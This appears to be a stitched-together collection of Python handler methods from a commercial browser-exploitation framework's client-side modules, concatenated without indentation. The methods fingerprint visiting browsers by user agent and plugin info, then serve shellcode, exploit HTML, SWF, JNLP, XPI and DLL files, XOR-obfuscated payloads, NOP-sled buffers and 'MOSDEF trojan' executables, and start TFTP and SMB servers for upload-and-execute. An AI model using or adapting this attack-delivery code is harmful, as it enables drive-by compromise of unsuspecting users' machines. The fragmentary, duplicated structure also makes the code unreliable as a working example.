def makesploit(self, clientheader, clientbody):
"""
This is the main method for this module. Every clientside should have this method,
and it is going to get called by ClientD in order to construct the response
that will be sent to the target browser.
"""
h = spkproxy.header('SERVER')
b = spkproxy.body()
# clientheader is a dictionary that contains all headers sent by the target browser
# here we get the user agent
user_agent = clientheader.getStrValue(['User-Agent'])
self.log("[+] User agent of connecting host: %s" % user_agent)
# Here we check to see if the browser is Firefox
if 'firefox' in user_agent.lower():
self.log("[+] Sending HTML")
b.setBody("""
<html>
<head>
</head>
<body>
<center><h1>Firefox detected!</h1></center>
</body></html>
""")
else:
self.log("[+] Redirect to Google")
h.status = '302'
h.addHeader('Location', 'http://www.google.com')
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('Requested URL: %s' % clientheader.URL)
if clientheader.URL.count(self.htmlfilename):
self.log('Serving HTML file')
self.createShellcode()
b.setBody(self.makeHTML())
h.addHeader('Content-Type', 'text/html')
elif clientheader.URL.count(self.jsfilename):
self.log('Serving JS file')
b.setBody(self.makeJS())
h.addHeader('Content-Type', 'text/javascript')
elif clientheader.URL.count(self.swffilename):
flash_version = clientheader.getStrValue(['x-flash-version'])
flash_version = flash_version.replace(',', '.')
for i in range(len(targets)):
if flash_version == targets[i][1]:
self.clientversion = i
break
self.log('Serving SWF file for Adobe Flash Player v%s' %
(flash_version))
b.setBody(self.makeSWF())
h.addHeader('Content-Type', 'application/x-shockwave-flash')
else:
self.log('redirecting to self')
h.status = '302'
h.addHeader('Location', self.htmlfilename)
return h, b
def makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h=header("SERVER")
b=body()
user_agent=clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s"%user_agent)
if user_agent.count("MSIE")==0:
#still need to determine if it's pretending to be IE by spoofing User-Agent string
self.log("Non IE browser connected - returning None")
return None,None
#send the exploit
self.log("Sending the Speech attack html file")
sploitstring=self.makefile()
if not sploitstring:
return None,None
b.setBody(sploitstring)
return h,b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
if clientheader.URL.count(self.htmlfilename):
self.log('Serving HTML file')
b.setBody(self.makeHTML())
elif clientheader.URL.count(self.jsfilename):
self.log('Serving JS file')
b.setBody(self.makeJS())
elif clientheader.URL.count(self.swffilename):
flash_version = clientheader.getStrValue(['x-flash-version'])
flash_version = flash_version.replace(',', '.')
for i in range(len(targets)):
if flash_version == targets[i][1]:
self.clientversion = i
break
if self.clientversion == 0:
self.log('Unknown Adobe Flash Player v%s' % (flash_version))
h.status = '404'
return h, b
self.log('Serving SWF file for Adobe Flash Player v%s' %
(flash_version))
self.createShellcode()
b.setBody(self.makeSWF())
else:
self.log('redirecting to self')
h.status = '302'
h.addHeader('Location', self.htmlfilename)
h.addHeader('Content-Type', 'binary/octet-stream')
return h, b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
if clientheader.URL.count(self.filename):
sploitstring = self.makefile()
b.setBody(sploitstring)
elif clientheader.URL.count(self.trojanname):
self.maketrojan()
self.log("Sending MOSDEF trojan")
f = open(self.trojanname, "rb")
sploitstring = f.read()
f.close()
os.remove(self.trojanname)
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", "binary/octet-stream")
h.addHeader("Connection", "close")
b.setBody(sploitstring)
else:
self.log('Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'binary/octet-stream')
return h, b
def makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h=header("SERVER")
b=body()
user_agent=clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s"%user_agent)
if user_agent.count("MSIE")==0:
#still need to determine if it's pretending to be IE by spoofing User-Agent string
self.log("Non IE browser connected - returning None")
return None,None
if user_agent.lower().count("windows nt") == 0:
#all the supported versions are NT based
return None,None
#the ugliest python line ever
windowsver = user_agent.lower().split("windows nt ")[1].split(";")[0].split(")")[0]
#send the exploit
self.log("Sending the GOMPlayer attack html file")
sploitstring=self.makefile(windowsver)
if not sploitstring:
return None,None
b.setBody(sploitstring)
return h,b
def makesploit(self, clientheader, clientbody):
h = header('SERVER')
b = body()
# if there is no info about plugins, at least we can filter using
# the user-agent making sure target is Windows
useragent = clientheader.getStrValue(['User-Agent'])
if "windows" in useragent.lower():
if 'win64' in useragent.lower():
self.createShellcode(True)
else:
self.createShellcode(False)
else:
self.log_error("Bailing on this client as it is not likely to be vulnerable")
return None, None
if self.xapfilename in clientheader.URL:
self.log_info('Serving XAP file')
b.setBody(self.makeXAP())
h.addHeader('Content-Type', 'application/x-silverlight-app')
elif self.filename in clientheader.URL:
self.log_info('Serving HTML file')
sploitstring = self.makefile()
b.setBody(sploitstring)
h.addHeader('Content-Type', 'text/html')
else:
self.log_info('Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
cookies = clientheader.getStrValue(['Cookie'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
if clientheader.URL.count(self.filename):
data = self.makefile(browser, osversion)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit file')
data = self.makefile()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self, clientheader, clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h = header("SERVER")
b = body()
user_agent = clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s" % user_agent)
if ".jar" in clientheader.URL:
f = open(os.path.join("Resources", "javanode.jar"), "rb")
sploitstring = f.read()
f.close()
self.mimetype = "application/octet-stream"
elif ".odb" in clientheader.URL:
sploitstring = self.makefile()
self.mimetype = "application/vnd.oasis.opendocument.database"
else:
#redirect to self
self.log("redirecting to self")
h.status = "302"
h.addHeader("Location", self.filename)
h.addHeader("Content-Type", "text/html")
return h, b
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Connection", "close")
b.setBody(sploitstring)
return h, b
def makesploit(self, clientheader, clientbody):
"""
For use by exploits/httpserver/httpserver.py -O singleexploit:upload -O destfilename:testvuln
"""
from libs.spkproxy import header, body
h = header("SERVER")
b = body()
user_agent = clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s" % user_agent)
if 1:
self.log("Sending the trojan exe file")
sploitstring = self.makedownloadfile()
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", self.datatype)
h.addHeader("Connection", "close")
b.setBody(sploitstring)
else:
#redirect to self
self.log("redirecting to self")
h.status = "302"
h.addHeader("Location", self.filename)
h.addHeader("Content-Type", "text/html")
return h, b
def makesploit(self, clientheader, clientbody):
self.nlog(
"\n---------------\nmakesploit - URL = %s\n---------------\n" %
clientheader.URL)
h = header('SERVER')
b = body()
if self.plugin_info:
info_dict = self.plugin_info
self.log_info(
"We got a plugin info for this target - thanks clientd!")
if self.is_vulnerable(info_dict):
self.log_info("This client is most likely vulnerable")
self.createShellcode()
else:
self.log_error(
"Bailing on this client as it is not likely to be vulnerable"
)
return None, None
else:
# if there is no info about plugins, at least we can filter using
# the user-agent making sure target is Windows
useragent = clientheader.getStrValue(['User-Agent'])
self.log("User-Agent = %s" % useragent)
if "windows" in useragent.lower():
self.log_info("This client is likely to be vulnerable")
self.createShellcode()
else:
self.log_error(
"Bailing on this client as it is not likely to be vulnerable"
)
return None, None
self.nlog(clientheader.URL)
if clientheader.URL.count(self.filename):
self.nlog('Serving HTML file')
sploitstring = self.makefile()
b.setBody(sploitstring)
h.addHeader('Content-Type', 'text/html')
elif clientheader.URL.count(self.swffilename):
self.nlog('Serving SWF file')
b.setBody(self.makeSWF())
h.addHeader('Content-Type', 'application/x-shockwave-flash')
self.nlog('Served SWF file')
elif clientheader.URL.count("code"):
self.nlog("serving shellcode")
h.addHeader('Content-Type', 'application/octet-stream')
b.setBody(self.xorer.encrypt(zlib.compress(self.shellcode)))
else:
self.nlog('Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self,clientheader,clientbody):
from libs.spkproxy import header,body
h=header('SERVER')
b=body()
if self.plugin_info:
info_dict=self.plugin_info
self.log("We got a plugin info for this target - thanks clientd!")
if self.is_vulnerable(info_dict):
self.log("This client is most likely vulnerable!")
else:
self.log("Bailing on this client as it is not likely to be vulnerable.")
return None, None
if clientheader.URL.count(self.filename):
self.log('Serving HTML file')
sploitstring=self.makefile()
b.setBody(sploitstring)
h.addHeader('Content-Type','text/html')
#h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey())
elif clientheader.URL.count(self.cssfile):
self.log('Serving CSS file')
sploitstring=self.make_css()
b.setBody(sploitstring)
h.addHeader('Content-Type','text/css')
#h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('redirecting to self')
h.status='302'
h.addHeader('Location',self.filename)
h.addHeader('Content-Type','text/html')
return h,b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
# header is used to store request and reponse headers
header = header('SERVER')
body = body()
# Clientd gives us a lot of information about the remote endpoint
if self.plugin_info:
# Check if the remote endpoint is vulnerable to our exploit
if self.is_vulnerable(self.plugin_info) == 0:
self.log(
'Bailing on this client as it is not likely to be vulnerable'
)
#Return a 404 here?
return None, None
if clientheader.URL.count(self.filename):
self.log('%s: Serving HTML file' % self.name)
# Create the shellcode (self.shellcode)
self.createShellcode()
# Create the HTML Contents
html = self.makefile(request_header=clientheader)
if not html:
self.log("%s: Error creating HTML for this exploit" %
self.name)
return None, None #done
body.setBody(html)
header.addHeader('Content-Type', 'text/html')
header.addHeader('Set-Cookie',
'SessionID=%d' % (self.jsObfuscator.getXORKey()))
else:
self.log('%s: Redirecting to self' % self.name)
header.status = '302'
header.addHeader('Location', self.filename)
header.addHeader('Content-Type', 'text/html')
return header, body
def makesploit(self, clientheader, clientbody):
self.test()
if self.startTFTP == 1:
t = Thread(target=self.upload_and_execute)
t.start()
self.startTFTP = 0
time.sleep(3)
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
if clientheader.URL.count(self.htmlfilename):
self.log('Serving HTML file')
b.setBody(self.makeHTML())
h.addHeader('Content-Type', 'text/html')
elif clientheader.URL.count(self.dest_pdf):
self.log('Serving PDF file')
h.addHeader('Content-Type', 'application/pdf')
b.setBody(file(self.dest_pdf, 'rb').read())
else:
self.log('redirecting to self')
h.status = '302'
h.addHeader('Location', self.htmlfilename)
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self, clientheader, clientbody):
h=header('SERVER')
b=body()
encodedURI = self.encodeURI()
ua = clientheader.getHeaderValue('User-Agent')
print ua
self.setTarget(ua)
if self.plugin_info:
info_dict=self.plugin_info
self.log("We got a plugin info for this target - thanks clientd!")
if self.is_vulnerable(info_dict):
self.log("This client is most likely vulnerable!")
else:
self.log("Bailing on this client as it is not likely to be vulnerable.")
return None, None
# serve the html loader
if clientheader.URL.count(self.filename):
self.log('Serving HTML file')
self.createShellcode()
sploitstring = self.generateHtml(ua, encodedURI)
b.setBody(sploitstring)
h.addHeader('Content-Type','text/html')
# serve the swf exploit
elif clientheader.URL.count("%s?cat=%s" % (self.swfName, encodedURI)):
self.log('Serving SWF')
b.setBody(self.makeSWF())
h.addHeader('Content-Type','application/x-shockwave-flash')
# serve the mosdef
elif clientheader.URL.count(self.payloadName):
fversion = clientheader.getHeaderValue('x-flash-version')
ua = clientheader.getHeaderValue('User-Agent')
self.log('Serving Payload')
self.stage1 = self.generateStageOneCode(fversion)
self.createAndEncodeShellcode()
b.setBody(self.stage1 + self.shellcode)
h.addHeader('Content-Type','text/html')
elif clientheader.URL.count("exit"):
self.log('Max retries reached. Exploit failed. Not vulnerable?')
h.status='302'
h.addHeader('Location',"http://www.google.com")
h.addHeader('Content-Type','text/html')
return h,b
else:
# basically, if we redirect the target on
# the first request we are doomed. So instead
# we just send them the HTML loader straight away
self.log('Serving HTML file (via the redirect)')
self.createShellcode()
sploitstring = self.generateHtml(ua, encodedURI)
b.setBody(sploitstring)
h.addHeader('Content-Type','text/html')
return h,b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
user_agent = clientheader.getStrValue(['User-Agent'])
self.CANSessID = clientheader.getStrValue(['Cookie'])
# self.CANSessID will be the full CANSessID=1234... string
if (self.CANSessID and self.CANSessID not in ['0']
and self.CANSessID.count('CANSessID')):
self.log("Scavenged original CANSessID from client [%s]" %
self.CANSessID)
self.log("User agent of connecting host: %s" % user_agent)
self.maketrojan()
path = os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_jnlp/"
# JNLP file request
if clientheader.URL.count(self.jnlpfile):
self.log("Sending JNLP file: %s" % (self.jnlpfile))
h.addHeader('Content-Type', 'application/x-java-jnlp-file')
sploitstring = self.makefile()
b.setBody(sploitstring)
# JAR file request
elif clientheader.URL.count(self.jarfile):
self.log("Sending JAR file")
f = open(path + self.jarfile, "rb")
sploitstring = f.read()
f.close()
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", "binary/octet-stream")
h.addHeader("Connection", "close")
b.setBody(sploitstring)
# Windows MOSDEF trojan file request
elif clientheader.URL.count(self.trojannamew):
self.log("Sending MOSDEF trojan")
f = open(self.trojannamew, "rb")
sploitstring = f.read()
f.close()
os.remove(self.trojannamew)
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", "binary/octet-stream")
h.addHeader("Connection", "close")
b.setBody(sploitstring)
# Redirect to JNLP file
else:
self.log('Redirecting to self')
h.status = '302'
h.addHeader('Location', self.jnlpfile)
h.addHeader('Content-Type', 'binary/octet-stream')
return h, b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.maketrojan_win()
self.maketrojan_linux()
if clientheader.URL.count(self.filename):
sploitstring = self.makefile()
b.setBody(sploitstring)
elif clientheader.URL.count(self.trojannamewin):
self.log("Sending MOSDEF trojan")
f = open(self.trojannamewin, "rb")
sploitstring = f.read()
f.close()
os.remove(self.trojannamewin)
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", "binary/octet-stream")
h.addHeader("Connection", "close")
b.setBody(sploitstring)
elif clientheader.URL.count(self.trojannamelinux):
self.log("Sending MOSDEF trojan")
f = open(self.trojannamelinux, "rb")
sploitstring = f.read()
f.close()
os.remove(self.trojannamelinux)
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", "binary/octet-stream")
h.addHeader("Connection", "close")
b.setBody(sploitstring)
elif clientheader.URL.count(self.xpiname):
self.log("Creating XPI file")
self.makexpi()
self.log("Sending XPI file")
f = open(
os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_ffmosdef/" +
self.xpiname, "rb")
sploitstring = f.read()
f.close()
os.remove(os.getcwd() +
"/3rdparty/D2SEC/exploits/d2sec_ffmosdef/" +
self.xpiname)
self.log("Sending %d bytes" % len(sploitstring))
h.addHeader("Content-type", "application/x-xpinstall")
h.addHeader("Connection", "close")
b.setBody(sploitstring)
else:
self.log("Redirecting to self")
h.status = "302"
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'binary/octet-stream')
return h, b
def resp_207(self, content_body):
h = header("SERVER")
b = body()
h.status = "207"
h.msg = "Multi-Status"
h.addHeader("Content-Type", 'text/xml; charset="utf8"')
b.setBody(content_body)
return h, b
def resp_403(self):
h = header("SERVER")
b = body()
h.status = "403"
h.msg = "Forbidden"
h.addHeader("Content-Type", "text/html")
b.setBody("")
return h, b
def resp_404(self):
h = header("SERVER")
b = body()
h.status = "404"
h.msg = "Not Found"
h.addHeader("Content-Type", "text/html")
b.setBody("")
return h, b
def makesploit(self, clientheader, clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h = header("SERVER")
b = body()
if self.plugin_info:
info_dict = self.plugin_info
self.log("We got a plugin info for this target - thanks clientd!")
if self.is_vulnerable(self.plugin_info):
self.log("This client is most likely vulnerable!")
else:
self.log(
"Bailing on this client as it is not likely to be vulnerable (%s)"
% self.plugin_info.get("language"))
return None, None
else:
self.log("Assuming vulnerable - no plugin info found!")
#get base url
self.baseurl = self.sessionstate.loader.canvasobj.getBaseURL()
if not self.tftpd:
# Set up the tftp server
self.tftpd = self.set_up_tftp_server()
if self.tftpd:
self.log("Starting TFTPD thread")
tftpd_thread = Thread(target=self.check_tftpd)
tftpd_thread.start()
if not self.tftpd:
self.log("Could not start TFTPD, going to next exploit!")
return None, None
if clientheader.URL.count(self.filename):
self.log("Serving first stage")
sploitstring = self.makefile()
b.setBody(sploitstring)
elif clientheader.URL.count(self.fileasx):
self.log("Serving asx")
sploitstring = self.makeasx()
b.setBody(sploitstring)
elif clientheader.URL.count(self.downexec):
self.log("Serving downexec")
sploitstring = self.makedownexec()
b.setBody(sploitstring)
elif clientheader.URL.count(self.icon):
self.log("Serving icon")
sploitstring = self.icondata
b.setBody(sploitstring)
else:
self.log('redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h=header("SERVER")
b=body()
user_agent=clientheader.getStrValue(["User-Agent"])
self.log("User agent of connecting host: %s"%user_agent)
if user_agent.count("MSIE")==0:
#could be spoofed
self.log("Non IE browser connected - returning None")
return None,None
#Get options
if self.callback:
self.log("Using callback.ip for bindip: %s"%self.callback.ip)
self.bindip=self.callback.ip
else:
self.log("Could not figure out callback or bindip - please set bindip to a real IP!")
return None, None
if hasattr(self, "clientsideargs"):
self.HTTP = self.clientsideargs["HTTPMOSDEF"]
self.SSL = self.clientsideargs["useSSLMOSDEF"]
for arg in self.clientsideargs["user_supplied_args"]:
value = self.clientsideargs["user_supplied_args"][arg]
#print "%s = %s" % (arg,value) # debug
if arg == "message":
self.message = value
elif arg == "title":
self.title = value
elif arg == "infiniteloop":
self.infiniteloop = value in ["True","true"]
else:
raise NameError("Can not load options, must be run from httpserver")
# Set up the tftp server
tftp = Thread(target=self.set_up_tftp_server)
tftp.start()
# Set up the threaded smb server
smb = Thread(target=self.set_up_smb_server)
smb.start()
self.log("Serving evil html")
sploitstring = self.makefile()
b.setBody(sploitstring)
return h,b
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
#self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit html file')
data = self.makefile(browser, osversion)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('.dll')):
if browser == "MSIE 7.0":
self.log('WP> Serving IE7 .Net DLL file')
self.vProtect = True # Needed for this type of payload
p = PElib()
data = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
self.vProtect = False # Reset this
else:
self.log('WP> Serving IE8 .Net DLL file')
p = PElib()
data = p.createDotNETPEFileBuf("", self.pc)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'application/octet-stream')
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
self.log('WP> ****************************************')
return h, b
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
if self.plugin_info:
info_dict = self.plugin_info
self.log("We got a plugin info for this target - thanks clientd!")
if self.is_vulnerable(info_dict):
self.log("This client is most likely vulnerable!")
else:
self.log(
"Bailing on this client as it is not likely to be vulnerable."
)
return None, None
if clientheader.URL.count(self.filename[:-7]):
#if clientheader.URL.count(self.filename):
self.log('Serving HTML file')
ptrs = []
heap_base = 0x0000a000
heap_top = 0x00414000
step = 0x1000
addr = heap_base
for i in range((heap_top - heap_base) / step):
ptrs.append(addr)
addr += step
sploitstring = self.search_ptr(ptrs, 0)
b.setBody(sploitstring)
h.addHeader('Content-Type', 'text/html')
elif clientheader.URL.count(self.cssfile):
self.log('Serving CSS file')
sploitstring = self.make_css()
b.setBody(sploitstring)
h.addHeader('Content-Type', 'text/css')
elif clientheader.URL.count("exit"):
self.log('Max retries reached. Exploit failed. Not vulnerable?')
h.status = '302'
h.addHeader('Location', "http://www.google.com")
h.addHeader('Content-Type', 'text/html')
return h, b
else:
self.log('redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def handle(self, infd):
self.log("Handling connection")
clientheader = header(state="SERVER")
clientheader.ssl = self.ssl
ret = clientheader.readdata(infd)
clientbody = body()
if clientheader.gotGoodHeader():
if clientheader.bodySize() > 0 or clientheader.wasChunked:
self.log("Reading body")
clientbody.read(infd, clientheader.bodySize(),
clientheader.wasChunked, 0)
self.log("Read body")
self.log("Creating exploit response")
servheader, servbody = self.makesploit(clientheader, clientbody)
self.log("Responding")
bodydata = "".join(servbody.data)
#now we respond...
response = ""
response += "%s %s %s\r\n" % (servheader.version, servheader.status,
servheader.msg)
self.log(response)
for akey in servheader.headerValuesDict.keys():
if akey not in ["Content-Length", "Content-length"]:
response += servheader.grabHeader(akey)
self.log("Sending header data of %d bytes" % len(response))
chunked = 0 #for now, eventually we'll send random chunks down the pipe.\..
if not chunked:
response += "Content-Length: " + str(len(bodydata)) + "\r\n"
response += "\r\n"
response += "".join(bodydata)
self.log("Total response length is %d bytes" % len(response))
try:
infd.sendall(response)
except socket.error:
self.log("Connection closed by peer")
self.log("Response sent")
infd.close() #connection close - later on we'll keep it.
return
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
if clientheader.URL.count(self.filename):
self.createShellcode()
sploitstring = self.makefile()
b.setBody(sploitstring)
else:
self.log('redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'binary/octet-stream')
return h, b
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
#self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit html file')
data = self.makefile(browser, osversion)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('.dll')):
self.log('WP> Serving exploit DLL file')
data = open(
'3rdparty/White_Phosphorus/exploits/wp_quicktime_punk/ourdll.dll'
).read()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'application/octet-stream')
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
self.log('WP> ****************************************')
return h, b
def makesploit(self, clientheader, clientbody):
"""
Construct the attack
"""
from libs.spkproxy import header, body
h = header("SERVER")
b = body()
# Serve up our HTML page that redirects to overflow URL
sploitstring = self.makefile()
b.setBody(sploitstring)
self.responded = 1
return h, b
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
#self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit html file')
ourhost = "http://" + clientheader.getStrValue(['Host'])
data = self.makefile(ourhost)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('.dll')):
self.log('WP> Serving shellcode buffer')
data = "\x90" * 2000 + self.shellcode
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
self.log('WP> ****************************************')
return h, b